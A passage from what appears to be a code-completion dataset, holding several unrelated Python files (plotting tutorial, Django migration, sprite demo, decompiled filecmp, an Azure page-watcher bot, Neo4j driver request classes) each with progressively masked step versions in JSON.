"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\n\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\n\nprint(X[0])\nprint(X[0][1])\n\nfor row in X:\n print(row)\n\nnewX = X.flatten()\nprint(newX)\n\nprint(X > 15)\n\n# 데이터 준비\nx = np.arange(0, 6, 0.1) # 0에서 6까지 0.1 간격으로 생\ny = np.sin(x)\n\n# 그래프 그리기\nplt.plot(x, y)\nplt.show()\n\n# 데이터 준비\ny1 = np.sin(x)\ny2 = np.cos(x)\n\n# 그래프 그리기\nplt.plot(x, y1, label=\"sin\")\nplt.plot(x, y2, linestyle=\"--\", label=\"cos\") # cos 함수는 점선으로 그리기\nplt.xlabel(\"x\") # x축 이름\nplt.ylabel(\"y\") # y축 이름\nplt.title('sin & cos') # 제목\nplt.legend()\nplt.show()\n\n# 이미지 그리기\nimg = imread('/Users/jiwon/Downloads/R800x0.png') #이미지 읽어오기\n\nplt.imshow(img)\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.4 on 2019-04-17 03:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('historiasClinicas', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='actualizacion',
name='valoracion_medica',
field=models.CharField(choices=[('Apto para desempeñar el cargo sin patologia aparente', 'Apto para desempeñar el cargo sin patologia aparente'), ('Apto para desempañar el cargo con patologia que no limita la labor', 'Apto para desempañar el cargo con patologia que no limita la labor'), ('Apto con restricciones o adaptaciones para la labor', 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado', 'Aplazado'), ('Apto para labor el alturas', 'Apto para labor el alturas'), ('Apto para continuar desempeñando su labor', 'Apto para continuar desempeñando su labor'), ('Examen de retiro', 'Examen de retiro'), ('Apto para manipulación de alimentos', 'Apto para manipulación de alimentos')], max_length=50, verbose_name='Concepto de valoracion medica'),
),
]
|
normal
|
{
"blob_id": "4aefabf064cdef963f9c62bd5c93892207c301d3",
"index": 3076,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('historiasClinicas', '0001_initial')]\n operations = [migrations.AlterField(model_name='actualizacion', name=\n 'valoracion_medica', field=models.CharField(choices=[(\n 'Apto para desempeñar el cargo sin patologia aparente',\n 'Apto para desempeñar el cargo sin patologia aparente'), (\n 'Apto para desempañar el cargo con patologia que no limita la labor',\n 'Apto para desempañar el cargo con patologia que no limita la labor'\n ), ('Apto con restricciones o adaptaciones para la labor',\n 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado',\n 'Aplazado'), ('Apto para labor el alturas',\n 'Apto para labor el alturas'), (\n 'Apto para continuar desempeñando su labor',\n 'Apto para continuar desempeñando su labor'), ('Examen de retiro',\n 'Examen de retiro'), ('Apto para manipulación de alimentos',\n 'Apto para manipulación de alimentos')], max_length=50,\n verbose_name='Concepto de valoracion medica'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('historiasClinicas', '0001_initial')]\n operations = [migrations.AlterField(model_name='actualizacion', name=\n 'valoracion_medica', field=models.CharField(choices=[(\n 'Apto para desempeñar el cargo sin patologia aparente',\n 'Apto para desempeñar el cargo sin patologia aparente'), (\n 'Apto para desempañar el cargo con patologia que no limita la labor',\n 'Apto para desempañar el cargo con patologia que no limita la labor'\n ), ('Apto con restricciones o adaptaciones para la labor',\n 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado',\n 'Aplazado'), ('Apto para labor el alturas',\n 'Apto para labor el alturas'), (\n 'Apto para continuar desempeñando su labor',\n 'Apto para continuar desempeñando su labor'), ('Examen de retiro',\n 'Examen de retiro'), ('Apto para manipulación de alimentos',\n 'Apto para manipulación de alimentos')], max_length=50,\n verbose_name='Concepto de valoracion medica'))]\n",
"step-5": "# Generated by Django 2.1.4 on 2019-04-17 03:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('historiasClinicas', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='actualizacion',\n name='valoracion_medica',\n field=models.CharField(choices=[('Apto para desempeñar el cargo sin patologia aparente', 'Apto para desempeñar el cargo sin patologia aparente'), ('Apto para desempañar el cargo con patologia que no limita la labor', 'Apto para desempañar el cargo con patologia que no limita la labor'), ('Apto con restricciones o adaptaciones para la labor', 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado', 'Aplazado'), ('Apto para labor el alturas', 'Apto para labor el alturas'), ('Apto para continuar desempeñando su labor', 'Apto para continuar desempeñando su labor'), ('Examen de retiro', 'Examen de retiro'), ('Apto para manipulación de alimentos', 'Apto para manipulación de alimentos')], max_length=50, verbose_name='Concepto de valoracion medica'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pycat.base.color import Color
from pycat.sprite import Sprite
from pycat.window import Window
from pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV
from random import randint
window=Window()
class Chick(Sprite):
def on_create(self):
self.image = 'chick-a.png'
self.goto_random_position()
self.opacity = 500
self.scale = 1
self.rotation = randint(0, 360)
# c1 = window.create_sprite(Chick)
# c2 = window.create_sprite(Chick)
for i in range(1000):
e = window.create_sprite(Chick)
e.opacity = 200
e.scale = 2
e.color = Color.RED
window.run()
|
normal
|
{
"blob_id": "cc7942c406e9bcb5af43f131fdf0a6441f81c16a",
"index": 4260,
"step-1": "<mask token>\n\n\nclass Chick(Sprite):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-3": "<mask token>\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-4": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-5": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow=Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\n# c1 = window.create_sprite(Chick)\n# c2 = window.create_sprite(Chick)\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\n\nwindow.run()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: filecmp
import os, stat
from itertools import ifilter, ifilterfalse, imap, izip
__all__ = [
'cmp', 'dircmp', 'cmpfiles']
_cache = {}
BUFSIZE = 8192
def cmp(f1, f2, shallow=1):
s1 = _sig(os.stat(f1))
s2 = _sig(os.stat(f2))
if s1[0] != stat.S_IFREG or s2[0] != stat.S_IFREG:
return False
if shallow and s1 == s2:
return True
if s1[1] != s2[1]:
return False
outcome = _cache.get((f1, f2, s1, s2))
if outcome is None:
outcome = _do_cmp(f1, f2)
if len(_cache) > 100:
_cache.clear()
_cache[(f1, f2, s1, s2)] = outcome
return outcome
def _sig(st):
return (
stat.S_IFMT(st.st_mode),
st.st_size,
st.st_mtime)
def _do_cmp(f1, f2):
bufsize = BUFSIZE
with open(f1, 'rb') as (fp1):
with open(f2, 'rb') as (fp2):
while True:
b1 = fp1.read(bufsize)
b2 = fp2.read(bufsize)
if b1 != b2:
return False
if not b1:
return True
class dircmp:
def __init__(self, a, b, ignore=None, hide=None):
self.left = a
self.right = b
if hide is None:
self.hide = [
os.curdir, os.pardir]
else:
self.hide = hide
if ignore is None:
self.ignore = [
'RCS', 'CVS', 'tags']
else:
self.ignore = ignore
return
def phase0(self):
self.left_list = _filter(os.listdir(self.left), self.hide + self.ignore)
self.right_list = _filter(os.listdir(self.right), self.hide + self.ignore)
self.left_list.sort()
self.right_list.sort()
def phase1(self):
a = dict(izip(imap(os.path.normcase, self.left_list), self.left_list))
b = dict(izip(imap(os.path.normcase, self.right_list), self.right_list))
self.common = map(a.__getitem__, ifilter(b.__contains__, a))
self.left_only = map(a.__getitem__, ifilterfalse(b.__contains__, a))
self.right_only = map(b.__getitem__, ifilterfalse(a.__contains__, b))
def phase2(self):
self.common_dirs = []
self.common_files = []
self.common_funny = []
for x in self.common:
a_path = os.path.join(self.left, x)
b_path = os.path.join(self.right, x)
ok = 1
try:
a_stat = os.stat(a_path)
except os.error as why:
ok = 0
try:
b_stat = os.stat(b_path)
except os.error as why:
ok = 0
if ok:
a_type = stat.S_IFMT(a_stat.st_mode)
b_type = stat.S_IFMT(b_stat.st_mode)
if a_type != b_type:
self.common_funny.append(x)
elif stat.S_ISDIR(a_type):
self.common_dirs.append(x)
elif stat.S_ISREG(a_type):
self.common_files.append(x)
else:
self.common_funny.append(x)
else:
self.common_funny.append(x)
def phase3(self):
xx = cmpfiles(self.left, self.right, self.common_files)
self.same_files, self.diff_files, self.funny_files = xx
def phase4(self):
self.subdirs = {}
for x in self.common_dirs:
a_x = os.path.join(self.left, x)
b_x = os.path.join(self.right, x)
self.subdirs[x] = dircmp(a_x, b_x, self.ignore, self.hide)
def phase4_closure(self):
self.phase4()
for sd in self.subdirs.itervalues():
sd.phase4_closure()
def report(self):
print 'diff', self.left, self.right
if self.left_only:
self.left_only.sort()
print 'Only in', self.left, ':', self.left_only
if self.right_only:
self.right_only.sort()
print 'Only in', self.right, ':', self.right_only
if self.same_files:
self.same_files.sort()
print 'Identical files :', self.same_files
if self.diff_files:
self.diff_files.sort()
print 'Differing files :', self.diff_files
if self.funny_files:
self.funny_files.sort()
print 'Trouble with common files :', self.funny_files
if self.common_dirs:
self.common_dirs.sort()
print 'Common subdirectories :', self.common_dirs
if self.common_funny:
self.common_funny.sort()
print 'Common funny cases :', self.common_funny
def report_partial_closure(self):
self.report()
for sd in self.subdirs.itervalues():
print
sd.report()
def report_full_closure(self):
self.report()
for sd in self.subdirs.itervalues():
print
sd.report_full_closure()
methodmap = dict(subdirs=phase4, same_files=phase3, diff_files=phase3, funny_files=phase3, common_dirs=phase2, common_files=phase2, common_funny=phase2, common=phase1, left_only=phase1, right_only=phase1, left_list=phase0, right_list=phase0)
def __getattr__(self, attr):
if attr not in self.methodmap:
raise AttributeError, attr
self.methodmap[attr](self)
return getattr(self, attr)
def cmpfiles(a, b, common, shallow=1):
res = ([], [], [])
for x in common:
ax = os.path.join(a, x)
bx = os.path.join(b, x)
res[_cmp(ax, bx, shallow)].append(x)
return res
def _cmp(a, b, sh, abs=abs, cmp=cmp):
try:
return not abs(cmp(a, b, sh))
except (os.error, IOError):
return 2
def _filter(flist, skip):
return list(ifilterfalse(skip.__contains__, flist))
def demo():
import sys, getopt
options, args = getopt.getopt(sys.argv[1:], 'r')
if len(args) != 2:
raise getopt.GetoptError('need exactly two args', None)
dd = dircmp(args[0], args[1])
if ('-r', '') in options:
dd.report_full_closure()
else:
dd.report()
return
if __name__ == '__main__':
demo()
|
normal
|
{
"blob_id": "38f6700b283bdc68a0271cb3ec397ce72aa2de3c",
"index": 6589,
"step-1": "# uncompyle6 version 3.2.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]\n# Embedded file name: filecmp\nimport os, stat\nfrom itertools import ifilter, ifilterfalse, imap, izip\n__all__ = [\n 'cmp', 'dircmp', 'cmpfiles']\n_cache = {}\nBUFSIZE = 8192\n\ndef cmp(f1, f2, shallow=1):\n s1 = _sig(os.stat(f1))\n s2 = _sig(os.stat(f2))\n if s1[0] != stat.S_IFREG or s2[0] != stat.S_IFREG:\n return False\n if shallow and s1 == s2:\n return True\n if s1[1] != s2[1]:\n return False\n outcome = _cache.get((f1, f2, s1, s2))\n if outcome is None:\n outcome = _do_cmp(f1, f2)\n if len(_cache) > 100:\n _cache.clear()\n _cache[(f1, f2, s1, s2)] = outcome\n return outcome\n\n\ndef _sig(st):\n return (\n stat.S_IFMT(st.st_mode),\n st.st_size,\n st.st_mtime)\n\n\ndef _do_cmp(f1, f2):\n bufsize = BUFSIZE\n with open(f1, 'rb') as (fp1):\n with open(f2, 'rb') as (fp2):\n while True:\n b1 = fp1.read(bufsize)\n b2 = fp2.read(bufsize)\n if b1 != b2:\n return False\n if not b1:\n return True\n\n\nclass dircmp:\n\n def __init__(self, a, b, ignore=None, hide=None):\n self.left = a\n self.right = b\n if hide is None:\n self.hide = [\n os.curdir, os.pardir]\n else:\n self.hide = hide\n if ignore is None:\n self.ignore = [\n 'RCS', 'CVS', 'tags']\n else:\n self.ignore = ignore\n return\n\n def phase0(self):\n self.left_list = _filter(os.listdir(self.left), self.hide + self.ignore)\n self.right_list = _filter(os.listdir(self.right), self.hide + self.ignore)\n self.left_list.sort()\n self.right_list.sort()\n\n def phase1(self):\n a = dict(izip(imap(os.path.normcase, self.left_list), self.left_list))\n b = dict(izip(imap(os.path.normcase, self.right_list), self.right_list))\n self.common = map(a.__getitem__, ifilter(b.__contains__, a))\n self.left_only = map(a.__getitem__, ifilterfalse(b.__contains__, a))\n self.right_only = map(b.__getitem__, ifilterfalse(a.__contains__, b))\n\n def phase2(self):\n self.common_dirs = []\n self.common_files = []\n self.common_funny = []\n for x in self.common:\n a_path = os.path.join(self.left, x)\n b_path = os.path.join(self.right, x)\n ok = 1\n try:\n a_stat = os.stat(a_path)\n except os.error as why:\n ok = 0\n\n try:\n b_stat = os.stat(b_path)\n except os.error as why:\n ok = 0\n\n if ok:\n a_type = stat.S_IFMT(a_stat.st_mode)\n b_type = stat.S_IFMT(b_stat.st_mode)\n if a_type != b_type:\n self.common_funny.append(x)\n elif stat.S_ISDIR(a_type):\n self.common_dirs.append(x)\n elif stat.S_ISREG(a_type):\n self.common_files.append(x)\n else:\n self.common_funny.append(x)\n else:\n self.common_funny.append(x)\n\n def phase3(self):\n xx = cmpfiles(self.left, self.right, self.common_files)\n self.same_files, self.diff_files, self.funny_files = xx\n\n def phase4(self):\n self.subdirs = {}\n for x in self.common_dirs:\n a_x = os.path.join(self.left, x)\n b_x = os.path.join(self.right, x)\n self.subdirs[x] = dircmp(a_x, b_x, self.ignore, self.hide)\n\n def phase4_closure(self):\n self.phase4()\n for sd in self.subdirs.itervalues():\n sd.phase4_closure()\n\n def report(self):\n print 'diff', self.left, self.right\n if self.left_only:\n self.left_only.sort()\n print 'Only in', self.left, ':', self.left_only\n if self.right_only:\n self.right_only.sort()\n print 'Only in', self.right, ':', self.right_only\n if self.same_files:\n self.same_files.sort()\n print 'Identical files :', self.same_files\n if self.diff_files:\n self.diff_files.sort()\n print 'Differing files :', self.diff_files\n if self.funny_files:\n self.funny_files.sort()\n print 'Trouble with common files :', self.funny_files\n if self.common_dirs:\n self.common_dirs.sort()\n print 'Common subdirectories :', self.common_dirs\n if self.common_funny:\n self.common_funny.sort()\n print 'Common funny cases :', self.common_funny\n\n def report_partial_closure(self):\n self.report()\n for sd in self.subdirs.itervalues():\n print\n sd.report()\n\n def report_full_closure(self):\n self.report()\n for sd in self.subdirs.itervalues():\n print\n sd.report_full_closure()\n\n methodmap = dict(subdirs=phase4, same_files=phase3, diff_files=phase3, funny_files=phase3, common_dirs=phase2, common_files=phase2, common_funny=phase2, common=phase1, left_only=phase1, right_only=phase1, left_list=phase0, right_list=phase0)\n\n def __getattr__(self, attr):\n if attr not in self.methodmap:\n raise AttributeError, attr\n self.methodmap[attr](self)\n return getattr(self, attr)\n\n\ndef cmpfiles(a, b, common, shallow=1):\n res = ([], [], [])\n for x in common:\n ax = os.path.join(a, x)\n bx = os.path.join(b, x)\n res[_cmp(ax, bx, shallow)].append(x)\n\n return res\n\n\ndef _cmp(a, b, sh, abs=abs, cmp=cmp):\n try:\n return not abs(cmp(a, b, sh))\n except (os.error, IOError):\n return 2\n\n\ndef _filter(flist, skip):\n return list(ifilterfalse(skip.__contains__, flist))\n\n\ndef demo():\n import sys, getopt\n options, args = getopt.getopt(sys.argv[1:], 'r')\n if len(args) != 2:\n raise getopt.GetoptError('need exactly two args', None)\n dd = dircmp(args[0], args[1])\n if ('-r', '') in options:\n dd.report_full_closure()\n else:\n dd.report()\n return\n\n\nif __name__ == '__main__':\n demo()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import datetime
import logging
import os
import requests
from bs4 import BeautifulSoup
import telebot
from azure.storage.blob import BlobClient
import hashlib
import azure.functions as func
def hash_string(input_string: str) -> str:
return hashlib.sha256(input_string.encode("utf-8")).hexdigest()
def main(mytimer: func.TimerRequest) -> None:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Python timer trigger function ran at %s', utc_timestamp)
url = os.environ['TargetUrl']
search_term = os.environ['SearchTerm']
reqs = requests.get(url)
soup = BeautifulSoup(reqs.text, 'html.parser')
token = telebot.TeleBot(os.environ['TelebotToken'])
chat_id = os.environ['TelebotChatId']
urls = []
for link in soup.find_all('a'):
link_url = link.get('href')
# Add only links that contain the search term
if search_term in link_url:
urls.append(link_url)
logging.info(f"Looking for: {search_term}")
logging.info(f"Urls conatining the pattern: {urls}")
lst_to_str = ';'.join([str(i) for i in urls])
new_hash = hash_string(lst_to_str)
now = datetime.datetime.now()
file_suffix = now.strftime("%Y%m%d%I%M%S")
year = now.year
month = now.month
day = now.day
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')
blob.upload_blob(lst_to_str, blob_type='BlockBlob')
logging.info(new_hash)
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name='hash.tmp')
blob_hash = ''
if blob.exists():
blob_hash = str(blob.download_blob().readall())
if blob_hash != new_hash:
message = f'Hash of this page: {url} has changed'
bot = telebot.TeleBot(token)
bot.config['api_key'] = token
bot.send_message(chat_id, message)
blob.delete_blob()
blob.upload_blob(new_hash, blob_type='BlockBlob')
logging.info(f'Old hash >>>> {blob_hash}')
logging.info(f'New hash >>>> {new_hash}')
|
normal
|
{
"blob_id": "670a23aa910a6709735281b7e64e5254a19277c6",
"index": 7924,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\ndef main(mytimer: func.TimerRequest) ->None:\n utc_timestamp = datetime.datetime.utcnow().replace(tzinfo=datetime.\n timezone.utc).isoformat()\n if mytimer.past_due:\n logging.info('The timer is past due!')\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\n url = os.environ['TargetUrl']\n search_term = os.environ['SearchTerm']\n reqs = requests.get(url)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n token = telebot.TeleBot(os.environ['TelebotToken'])\n chat_id = os.environ['TelebotChatId']\n urls = []\n for link in soup.find_all('a'):\n link_url = link.get('href')\n if search_term in link_url:\n urls.append(link_url)\n logging.info(f'Looking for: {search_term}')\n logging.info(f'Urls conatining the pattern: {urls}')\n lst_to_str = ';'.join([str(i) for i in urls])\n new_hash = hash_string(lst_to_str)\n now = datetime.datetime.now()\n file_suffix = now.strftime('%Y%m%d%I%M%S')\n year = now.year\n month = now.month\n day = now.day\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\n logging.info(new_hash)\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n 'hash.tmp')\n blob_hash = ''\n if blob.exists():\n blob_hash = str(blob.download_blob().readall())\n if blob_hash != new_hash:\n message = f'Hash of this page: {url} has changed'\n bot = telebot.TeleBot(token)\n bot.config['api_key'] = token\n bot.send_message(chat_id, message)\n blob.delete_blob()\n blob.upload_blob(new_hash, blob_type='BlockBlob')\n logging.info(f'Old hash >>>> {blob_hash}')\n logging.info(f'New hash >>>> {new_hash}')\n",
"step-4": "import datetime\nimport logging\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport telebot\nfrom azure.storage.blob import BlobClient\nimport hashlib\nimport azure.functions as func\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\ndef main(mytimer: func.TimerRequest) ->None:\n utc_timestamp = datetime.datetime.utcnow().replace(tzinfo=datetime.\n timezone.utc).isoformat()\n if mytimer.past_due:\n logging.info('The timer is past due!')\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\n url = os.environ['TargetUrl']\n search_term = os.environ['SearchTerm']\n reqs = requests.get(url)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n token = telebot.TeleBot(os.environ['TelebotToken'])\n chat_id = os.environ['TelebotChatId']\n urls = []\n for link in soup.find_all('a'):\n link_url = link.get('href')\n if search_term in link_url:\n urls.append(link_url)\n logging.info(f'Looking for: {search_term}')\n logging.info(f'Urls conatining the pattern: {urls}')\n lst_to_str = ';'.join([str(i) for i in urls])\n new_hash = hash_string(lst_to_str)\n now = datetime.datetime.now()\n file_suffix = now.strftime('%Y%m%d%I%M%S')\n year = now.year\n month = now.month\n day = now.day\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\n logging.info(new_hash)\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n 'hash.tmp')\n blob_hash = ''\n if blob.exists():\n blob_hash = str(blob.download_blob().readall())\n if blob_hash != new_hash:\n message = f'Hash of this page: {url} has changed'\n bot = telebot.TeleBot(token)\n bot.config['api_key'] = token\n bot.send_message(chat_id, message)\n blob.delete_blob()\n blob.upload_blob(new_hash, blob_type='BlockBlob')\n logging.info(f'Old hash >>>> {blob_hash}')\n logging.info(f'New hash >>>> {new_hash}')\n",
"step-5": "import datetime\r\nimport logging\r\nimport os\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport telebot\r\nfrom azure.storage.blob import BlobClient\r\nimport hashlib\r\n\r\nimport azure.functions as func\r\n\r\n\r\ndef hash_string(input_string: str) -> str:\r\n return hashlib.sha256(input_string.encode(\"utf-8\")).hexdigest()\r\n\r\n\r\ndef main(mytimer: func.TimerRequest) -> None:\r\n utc_timestamp = datetime.datetime.utcnow().replace(\r\n tzinfo=datetime.timezone.utc).isoformat()\r\n\r\n if mytimer.past_due:\r\n logging.info('The timer is past due!')\r\n\r\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\r\n\r\n url = os.environ['TargetUrl']\r\n search_term = os.environ['SearchTerm']\r\n reqs = requests.get(url)\r\n soup = BeautifulSoup(reqs.text, 'html.parser')\r\n token = telebot.TeleBot(os.environ['TelebotToken'])\r\n chat_id = os.environ['TelebotChatId']\r\n\r\n urls = []\r\n for link in soup.find_all('a'):\r\n link_url = link.get('href')\r\n # Add only links that contain the search term\r\n if search_term in link_url:\r\n urls.append(link_url)\r\n\r\n logging.info(f\"Looking for: {search_term}\")\r\n logging.info(f\"Urls conatining the pattern: {urls}\")\r\n\r\n lst_to_str = ';'.join([str(i) for i in urls])\r\n new_hash = hash_string(lst_to_str)\r\n now = datetime.datetime.now()\r\n file_suffix = now.strftime(\"%Y%m%d%I%M%S\")\r\n year = now.year\r\n month = now.month\r\n day = now.day\r\n\r\n blob = BlobClient.from_connection_string(\r\n conn_str=os.environ['AzureWebJobsStorage'], container_name=\"hashstore\", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\r\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\r\n\r\n logging.info(new_hash)\r\n\r\n blob = BlobClient.from_connection_string(\r\n conn_str=os.environ['AzureWebJobsStorage'], container_name=\"hashstore\", blob_name='hash.tmp')\r\n blob_hash = ''\r\n if blob.exists():\r\n blob_hash = str(blob.download_blob().readall())\r\n if blob_hash != new_hash:\r\n message = f'Hash of this page: {url} has changed'\r\n bot = telebot.TeleBot(token)\r\n bot.config['api_key'] = token\r\n bot.send_message(chat_id, message)\r\n blob.delete_blob()\r\n\r\n blob.upload_blob(new_hash, blob_type='BlockBlob')\r\n\r\n logging.info(f'Old hash >>>> {blob_hash}')\r\n logging.info(f'New hash >>>> {new_hash}')\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
All requests will be sent to backend as:
{
name: <class name>,
data: {
<all instance variables>
}
}
"""
class NewDriver:
def __init__(self, uri, authToken):
self.uri = uri
self.authorizationToken = authToken
class DriverClose:
def __init__(self, driverId):
self.driverId = driverId
class NewSession:
def __init__(self, driverId, accessMode, bookmarks):
self.driverId = driverId
self.accessMode = accessMode
self.bookmarks = bookmarks
class SessionClose:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Response should be Result model or raised Error model
"""
class SessionRun:
def __init__(self, sessionId, cypher, params):
self.sessionId = sessionId
self.cypher = cypher
self.params = params
class SessionReadTransaction:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a positive intent from the client application to commit the retryable transaction
"""
class RetryablePositive:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a negative intent from the client application to commit the retryable transaction
"""
class RetryableNegative:
def __init__(self, sessionId, errorId=""):
self.sessionId = sessionId
self.errorId = errorId
class TransactionRun:
def __init__(self, txId, cypher, params):
self.txId = txId
self.cypher = cypher
self.params = params
"""
Response should be Record model, NullRecord to indicate last record or raised Error model if record
couldn't be retrieved.
"""
class ResultNext:
def __init__(self, resultId):
self.resultId = resultId
class AuthorizationToken:
def __init__(self, scheme="none", principal="", credentials="", realm="", ticket=""):
self.scheme=scheme
self.principal=principal
self.credentials=credentials
self.realm=realm
self.ticket=ticket
|
normal
|
{
"blob_id": "dfcb095b26a21ba0c8ccc2a2c664bcfab29b8351",
"index": 8214,
"step-1": "<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-2": "<mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n 